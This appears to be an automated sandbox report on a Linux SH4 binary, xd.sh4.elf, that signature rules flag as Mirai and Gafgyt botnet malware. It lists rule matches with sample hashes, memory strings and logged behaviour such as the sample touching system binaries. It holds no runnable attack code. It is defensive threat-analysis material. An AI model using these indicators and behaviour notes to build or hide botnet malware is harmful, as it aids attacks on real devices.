              Source: 5421.1.00007f0bb0400000.00007f0bb0414000.r-x.sdmp, type: MEMORYMatched rule: Mirai_Botnet_Malware date = 2016-10-04, hash5 = 420bf9215dfb04e5008c5e522eee9946599e2b323b17f17919cd802ebb012175, hash4 = 2efa09c124f277be2199bee58f49fc0ce6c64c0bef30079dfb3d94a6de492a69, hash3 = 20683ff7a5fec1237fc09224af40be029b9548c62c693844624089af568c89d4, hash2 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, hash1 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, author = Florian Roth, description = Detects Mirai Botnet Malware, hash10 = c61bf95146c68bfbbe01d7695337ed0e93ea759f59f651799f07eecdb339f83f, hash11 = d9573c3850e2ae35f371dff977fc3e5282a5e67db8e3274fd7818e8273fd5c89, hash12 = f1100c84abff05e0501e77781160d9815628e7fd2de9e53f5454dbcac7c84ca5, hash9 = bf0471b37dba7939524a30d7d5afc8fcfb8d4a7c9954343196737e72ea4e2dc4, hash8 = 89570ae59462e6472b6769545a999bde8457e47ae0d385caaa3499ab735b8147, hash7 = 70bb0ec35dd9afcfd52ec4e1d920e7045dc51dca0573cd4c753987c9d79405c0, hash6 = 62cdc8b7fffbaf5683a466f6503c03e68a15413a90f6afd5a13ba027631460c6, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, hash13 = fb713ccf839362bf0fbe01aedd6796f4d74521b133011b408e42c1fd9ab8246b
              Source: 5421.1.00007f0bb0400000.00007f0bb0414000.r-x.sdmp, type: MEMORYMatched rule: MAL_ELF_LNX_Mirai_Oct10_2 date = 2018-10-27, hash1 = fa0018e75f503f9748a5de0d14d4358db234f65e28c31c8d5878cc58807081c9, author = Florian Roth, description = Detects ELF malware Mirai related, reference = Internal Research
              Source: 5419.1.00007f0bb0400000.00007f0bb0414000.r-x.sdmp, type: MEMORYMatched rule: Mirai_Botnet_Malware date = 2016-10-04, hash5 = 420bf9215dfb04e5008c5e522eee9946599e2b323b17f17919cd802ebb012175, hash4 = 2efa09c124f277be2199bee58f49fc0ce6c64c0bef30079dfb3d94a6de492a69, hash3 = 20683ff7a5fec1237fc09224af40be029b9548c62c693844624089af568c89d4, hash2 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, hash1 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, author = Florian Roth, description = Detects Mirai Botnet Malware, hash10 = c61bf95146c68bfbbe01d7695337ed0e93ea759f59f651799f07eecdb339f83f, hash11 = d9573c3850e2ae35f371dff977fc3e5282a5e67db8e3274fd7818e8273fd5c89, hash12 = f1100c84abff05e0501e77781160d9815628e7fd2de9e53f5454dbcac7c84ca5, hash9 = bf0471b37dba7939524a30d7d5afc8fcfb8d4a7c9954343196737e72ea4e2dc4, hash8 = 89570ae59462e6472b6769545a999bde8457e47ae0d385caaa3499ab735b8147, hash7 = 70bb0ec35dd9afcfd52ec4e1d920e7045dc51dca0573cd4c753987c9d79405c0, hash6 = 62cdc8b7fffbaf5683a466f6503c03e68a15413a90f6afd5a13ba027631460c6, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, hash13 = fb713ccf839362bf0fbe01aedd6796f4d74521b133011b408e42c1fd9ab8246b
              Source: 5419.1.00007f0bb0400000.00007f0bb0414000.r-x.sdmp, type: MEMORYMatched rule: MAL_ELF_LNX_Mirai_Oct10_2 date = 2018-10-27, hash1 = fa0018e75f503f9748a5de0d14d4358db234f65e28c31c8d5878cc58807081c9, author = Florian Roth, description = Detects ELF malware Mirai related, reference = Internal Research
              Source: 5427.1.00007f0bb0400000.00007f0bb0414000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
              Source: 5427.1.00007f0bb0400000.00007f0bb0414000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
              Source: 5427.1.00007f0bb0400000.00007f0bb0414000.r-x.sdmp, type: MEMORYMatched rule: Mirai_Botnet_Malware date = 2016-10-04, hash5 = 420bf9215dfb04e5008c5e522eee9946599e2b323b17f17919cd802ebb012175, hash4 = 2efa09c124f277be2199bee58f49fc0ce6c64c0bef30079dfb3d94a6de492a69, hash3 = 20683ff7a5fec1237fc09224af40be029b9548c62c693844624089af568c89d4, hash2 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, hash1 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, author = Florian Roth, description = Detects Mirai Botnet Malware, hash10 = c61bf95146c68bfbbe01d7695337ed0e93ea759f59f651799f07eecdb339f83f, hash11 = d9573c3850e2ae35f371dff977fc3e5282a5e67db8e3274fd7818e8273fd5c89, hash12 = f1100c84abff05e0501e77781160d9815628e7fd2de9e53f5454dbcac7c84ca5, hash9 = bf0471b37dba7939524a30d7d5afc8fcfb8d4a7c9954343196737e72ea4e2dc4, hash8 = 89570ae59462e6472b6769545a999bde8457e47ae0d385caaa3499ab735b8147, hash7 = 70bb0ec35dd9afcfd52ec4e1d920e7045dc51dca0573cd4c753987c9d79405c0, hash6 = 62cdc8b7fffbaf5683a466f6503c03e68a15413a90f6afd5a13ba027631460c6, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, hash13 = fb713ccf839362bf0fbe01aedd6796f4d74521b133011b408e42c1fd9ab8246b
              Source: 5427.1.00007f0bb0400000.00007f0bb0414000.r-x.sdmp, type: MEMORYMatched rule: MAL_ELF_LNX_Mirai_Oct10_2 date = 2018-10-27, hash1 = fa0018e75f503f9748a5de0d14d4358db234f65e28c31c8d5878cc58807081c9, author = Florian Roth, description = Detects ELF malware Mirai related, reference = Internal Research
              Source: 5414.1.00007f0bb0400000.00007f0bb0414000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
              Source: 5414.1.00007f0bb0400000.00007f0bb0414000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
              Source: 5414.1.00007f0bb0400000.00007f0bb0414000.r-x.sdmp, type: MEMORYMatched rule: Mirai_Botnet_Malware date = 2016-10-04, hash5 = 420bf9215dfb04e5008c5e522eee9946599e2b323b17f17919cd802ebb012175, hash4 = 2efa09c124f277be2199bee58f49fc0ce6c64c0bef30079dfb3d94a6de492a69, hash3 = 20683ff7a5fec1237fc09224af40be029b9548c62c693844624089af568c89d4, hash2 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, hash1 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, author = Florian Roth, description = Detects Mirai Botnet Malware, hash10 = c61bf95146c68bfbbe01d7695337ed0e93ea759f59f651799f07eecdb339f83f, hash11 = d9573c3850e2ae35f371dff977fc3e5282a5e67db8e3274fd7818e8273fd5c89, hash12 = f1100c84abff05e0501e77781160d9815628e7fd2de9e53f5454dbcac7c84ca5, hash9 = bf0471b37dba7939524a30d7d5afc8fcfb8d4a7c9954343196737e72ea4e2dc4, hash8 = 89570ae59462e6472b6769545a999bde8457e47ae0d385caaa3499ab735b8147, hash7 = 70bb0ec35dd9afcfd52ec4e1d920e7045dc51dca0573cd4c753987c9d79405c0, hash6 = 62cdc8b7fffbaf5683a466f6503c03e68a15413a90f6afd5a13ba027631460c6, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, hash13 = fb713ccf839362bf0fbe01aedd6796f4d74521b133011b408e42c1fd9ab8246b
              Source: 5414.1.00007f0bb0400000.00007f0bb0414000.r-x.sdmp, type: MEMORYMatched rule: MAL_ELF_LNX_Mirai_Oct10_2 date = 2018-10-27, hash1 = fa0018e75f503f9748a5de0d14d4358db234f65e28c31c8d5878cc58807081c9, author = Florian Roth, description = Detects ELF malware Mirai related, reference = Internal Research
              Source: 5425.1.00007f0bb0400000.00007f0bb0414000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
              Source: 5425.1.00007f0bb0400000.00007f0bb0414000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
              Source: 5425.1.00007f0bb0400000.00007f0bb0414000.r-x.sdmp, type: MEMORYMatched rule: Mirai_Botnet_Malware date = 2016-10-04, hash5 = 420bf9215dfb04e5008c5e522eee9946599e2b323b17f17919cd802ebb012175, hash4 = 2efa09c124f277be2199bee58f49fc0ce6c64c0bef30079dfb3d94a6de492a69, hash3 = 20683ff7a5fec1237fc09224af40be029b9548c62c693844624089af568c89d4, hash2 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, hash1 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, author = Florian Roth, description = Detects Mirai Botnet Malware, hash10 = c61bf95146c68bfbbe01d7695337ed0e93ea759f59f651799f07eecdb339f83f, hash11 = d9573c3850e2ae35f371dff977fc3e5282a5e67db8e3274fd7818e8273fd5c89, hash12 = f1100c84abff05e0501e77781160d9815628e7fd2de9e53f5454dbcac7c84ca5, hash9 = bf0471b37dba7939524a30d7d5afc8fcfb8d4a7c9954343196737e72ea4e2dc4, hash8 = 89570ae59462e6472b6769545a999bde8457e47ae0d385caaa3499ab735b8147, hash7 = 70bb0ec35dd9afcfd52ec4e1d920e7045dc51dca0573cd4c753987c9d79405c0, hash6 = 62cdc8b7fffbaf5683a466f6503c03e68a15413a90f6afd5a13ba027631460c6, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, hash13 = fb713ccf839362bf0fbe01aedd6796f4d74521b133011b408e42c1fd9ab8246b
              Source: 5425.1.00007f0bb0400000.00007f0bb0414000.r-x.sdmp, type: MEMORYMatched rule: MAL_ELF_LNX_Mirai_Oct10_2 date = 2018-10-27, hash1 = fa0018e75f503f9748a5de0d14d4358db234f65e28c31c8d5878cc58807081c9, author = Florian Roth, description = Detects ELF malware Mirai related, reference = Internal Research
              Source: Process Memory Space: xd.sh4.elf PID: 5414, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
              Source: Process Memory Space: xd.sh4.elf PID: 5414, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
              Source: Process Memory Space: xd.sh4.elf PID: 5419, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
              Source: Process Memory Space: xd.sh4.elf PID: 5419, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
              Source: Process Memory Space: xd.sh4.elf PID: 5421, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
              Source: Process Memory Space: xd.sh4.elf PID: 5421, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
              Source: Process Memory Space: xd.sh4.elf PID: 5423, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
              Source: Process Memory Space: xd.sh4.elf PID: 5423, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
              Source: Process Memory Space: xd.sh4.elf PID: 5425, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
              Source: Process Memory Space: xd.sh4.elf PID: 5425, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
              Source: Process Memory Space: xd.sh4.elf PID: 5427, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
              Source: Process Memory Space: xd.sh4.elf PID: 5427, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
              Source: Process Memory Space: xd.sh4.elf PID: 5430, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
              Source: Process Memory Space: xd.sh4.elf PID: 5430, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
              Source: classification engine, Classification label: mal100.spre.troj.evad.linELF@0/16@0/0

              Persistence and Installation Behavior

              barindex
              Source: /bin/fusermount (PID: 5586)File: /proc/5586/mountsJump to behavior
Source: /usr/bin/pkill (PID: 5562) | File opened: /proc/<pid>/status and /proc/<pid>/cmdline for each of the following PIDs, in the order they were read: 230, 110, 231, 111, 232, 112, 233, 113, 234, 114, 235, 115, 236, 116, 237, 117, 238, 118, 239, 119, 10, 11, 12, 13, 14, 5396, 15, 5397, 16, 17, 18, 19, 240, 3095, 120, 241, 121, 242, 1, 122, 243, 2, 123, 244, 3, 124, 245, 125, 4, 246, 126, 5, 247
Source: /usr/bin/gpu-manager (PID: 5545) | Shell command executed: sh -c "grep -G \"^blacklist.*nvidia[[:space:]]*$\" /etc/modprobe.d/*.conf"
Source: /usr/bin/gpu-manager (PID: 5547) | Shell command executed: sh -c "grep -G \"^blacklist.*nvidia[[:space:]]*$\" /lib/modprobe.d/*.conf"
Source: /usr/bin/gpu-manager (PID: 5549) | Shell command executed: sh -c "grep -G \"^blacklist.*radeon[[:space:]]*$\" /etc/modprobe.d/*.conf"
Source: /usr/bin/gpu-manager (PID: 5551) | Shell command executed: sh -c "grep -G \"^blacklist.*radeon[[:space:]]*$\" /lib/modprobe.d/*.conf"
Source: /usr/bin/gpu-manager (PID: 5553) | Shell command executed: sh -c "grep -G \"^blacklist.*amdgpu[[:space:]]*$\" /etc/modprobe.d/*.conf"
Source: /usr/bin/gpu-manager (PID: 5555) | Shell command executed: sh -c "grep -G \"^blacklist.*amdgpu[[:space:]]*$\" /lib/modprobe.d/*.conf"
Source: /usr/bin/gpu-manager (PID: 5557) | Shell command executed: sh -c "grep -G \"^blacklist.*nouveau[[:space:]]*$\" /etc/modprobe.d/*.conf"
Source: /usr/bin/gpu-manager (PID: 5559) | Shell command executed: sh -c "grep -G \"^blacklist.*nouveau[[:space:]]*$\" /lib/modprobe.d/*.conf"
Source: /bin/sh (PID: 5546) | Grep executable: /usr/bin/grep -> grep -G ^blacklist.*nvidia[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
Source: /bin/sh (PID: 5548) | Grep executable: /usr/bin/grep -> grep -G ^blacklist.*nvidia[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
Source: /bin/sh (PID: 5550) | Grep executable: /usr/bin/grep -> grep -G ^blacklist.*radeon[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
Source: /bin/sh (PID: 5552) | Grep executable: /usr/bin/grep -> grep -G ^blacklist.*radeon[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
Source: /bin/sh (PID: 5554) | Grep executable: /usr/bin/grep -> grep -G ^blacklist.*amdgpu[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
Source: /bin/sh (PID: 5556) | Grep executable: /usr/bin/grep -> grep -G ^blacklist.*amdgpu[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
Source: /bin/sh (PID: 5558) | Grep executable: /usr/bin/grep -> grep -G ^blacklist.*nouveau[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
Source: /bin/sh (PID: 5560) | Grep executable: /usr/bin/grep -> grep -G ^blacklist.*nouveau[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
Source: /usr/share/gdm/generate-config (PID: 5562) | Pkill executable: /usr/bin/pkill -> pkill --signal HUP --uid gdm dconf-service
Source: /usr/sbin/gdm3 (PID: 5564) | File: /var/run/gdm3 (bits: - usr: -x grp: x all: rwx)
Source: /usr/sbin/gdm3 (PID: 5564) | File: /var/log/gdm3 (bits: - usr: -x grp: x all: rwx)
Source: /usr/bin/gpu-manager (PID: 5544) | Log file created: /var/log/gpu-manager.log
Source: /usr/bin/gpu-manager (PID: 5596) | Log file created: /var/log/gpu-manager.log
Source: /usr/bin/gpu-manager (PID: 5607) | Log file created: /var/log/gpu-manager.log
Source: /usr/bin/gpu-manager (PID: 5617) | Log file created: /var/log/gpu-manager.log
Source: /usr/bin/gpu-manager (PID: 5627) | Log file created: /var/log/gpu-manager.log
Source: /usr/bin/gpu-manager (PID: 5637) | Log file created: /var/log/gpu-manager.log

Hooking and other Techniques for Hiding and Protection

Source: /tmp/xd.sh4.elf (PID: 5417) | File: /usr/lib/systemd/systemd
Source: /tmp/xd.sh4.elf (PID: 5417) | File: /usr/lib/systemd/systemd (deleted)
Source: /tmp/xd.sh4.elf (PID: 5417) | File: /usr/bin/pulseaudio
Source: /tmp/xd.sh4.elf (PID: 5417) | File: /usr/sbin/gdm3
Source: /usr/bin/gpu-manager (PID: 5544) | Truncated file: /var/log/gpu-manager.log
Source: /usr/bin/gpu-manager (PID: 5596) | Truncated file: /var/log/gpu-manager.log
Source: /usr/bin/gpu-manager (PID: 5607) | Truncated file: /var/log/gpu-manager.log
Source: /usr/bin/gpu-manager (PID: 5617) | Truncated file: /var/log/gpu-manager.log
Source: /usr/bin/gpu-manager (PID: 5627) | Truncated file: /var/log/gpu-manager.log
Source: /usr/bin/gpu-manager (PID: 5637) | Truncated file: /var/log/gpu-manager.log
Source: /usr/bin/pulseaudio (PID: 5534) | Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pkill (PID: 5562) | Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /tmp/xd.sh4.elf (PID: 5414) | Queries kernel information via 'uname'
Source: /usr/bin/pulseaudio (PID: 5534) | Queries kernel information via 'uname'
Source: /usr/bin/gpu-manager (PID: 5544) | Queries kernel information via 'uname'
Source: /usr/bin/gpu-manager (PID: 5596) | Queries kernel information via 'uname'
Source: /usr/bin/gpu-manager (PID: 5607) | Queries kernel information via 'uname'
Source: /usr/bin/gpu-manager (PID: 5617) | Queries kernel information via 'uname'
Source: /usr/bin/gpu-manager (PID: 5627) | Queries kernel information via 'uname'
Source: /usr/bin/gpu-manager (PID: 5637) | Queries kernel information via 'uname'
Source: xd.sh4.elf, 5414.1.00007ffe8ba43000.00007ffe8ba64000.rw-.sdmp, xd.sh4.elf, 5419.1.00007ffe8ba43000.00007ffe8ba64000.rw-.sdmp, xd.sh4.elf, 5421.1.00007ffe8ba43000.00007ffe8ba64000.rw-.sdmp, xd.sh4.elf, 5423.1.00007ffe8ba43000.00007ffe8ba64000.rw-.sdmp, xd.sh4.elf, 5425.1.00007ffe8ba43000.00007ffe8ba64000.rw-.sdmp, xd.sh4.elf, 5427.1.00007ffe8ba43000.00007ffe8ba64000.rw-.sdmp, xd.sh4.elf, 5430.1.00007ffe8ba43000.00007ffe8ba64000.rw-.sdmp | Binary or memory string: /usr/bin/qemu-sh4
Source: xd.sh4.elf, 5414.1.00005555d5e4f000.00005555d5ed2000.rw-.sdmp, xd.sh4.elf, 5419.1.00005555d5e4f000.00005555d5ed2000.rw-.sdmp, xd.sh4.elf, 5421.1.00005555d5e4f000.00005555d5ed2000.rw-.sdmp, xd.sh4.elf, 5423.1.00005555d5e4f000.00005555d5ed2000.rw-.sdmp, xd.sh4.elf, 5425.1.00005555d5e4f000.00005555d5ed2000.rw-.sdmp, xd.sh4.elf, 5427.1.00005555d5e4f000.00005555d5ed2000.rw-.sdmp, xd.sh4.elf, 5430.1.00005555d5e4f000.00005555d5ed2000.rw-.sdmp | Binary or memory string: /etc/qemu-binfmt/sh4
Source: xd.sh4.elf, 5414.1.00007ffe8ba43000.00007ffe8ba64000.rw-.sdmp, xd.sh4.elf, 5419.1.00007ffe8ba43000.00007ffe8ba64000.rw-.sdmp, xd.sh4.elf, 5421.1.00007ffe8ba43000.00007ffe8ba64000.rw-.sdmp, xd.sh4.elf, 5423.1.00007ffe8ba43000.00007ffe8ba64000.rw-.sdmp, xd.sh4.elf, 5425.1.00007ffe8ba43000.00007ffe8ba64000.rw-.sdmp, xd.sh4.elf, 5427.1.00007ffe8ba43000.00007ffe8ba64000.rw-.sdmp, xd.sh4.elf, 5430.1.00007ffe8ba43000.00007ffe8ba64000.rw-.sdmp | Binary or memory string: x86_64/usr/bin/qemu-sh4/tmp/xd.sh4.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/xd.sh4.elf
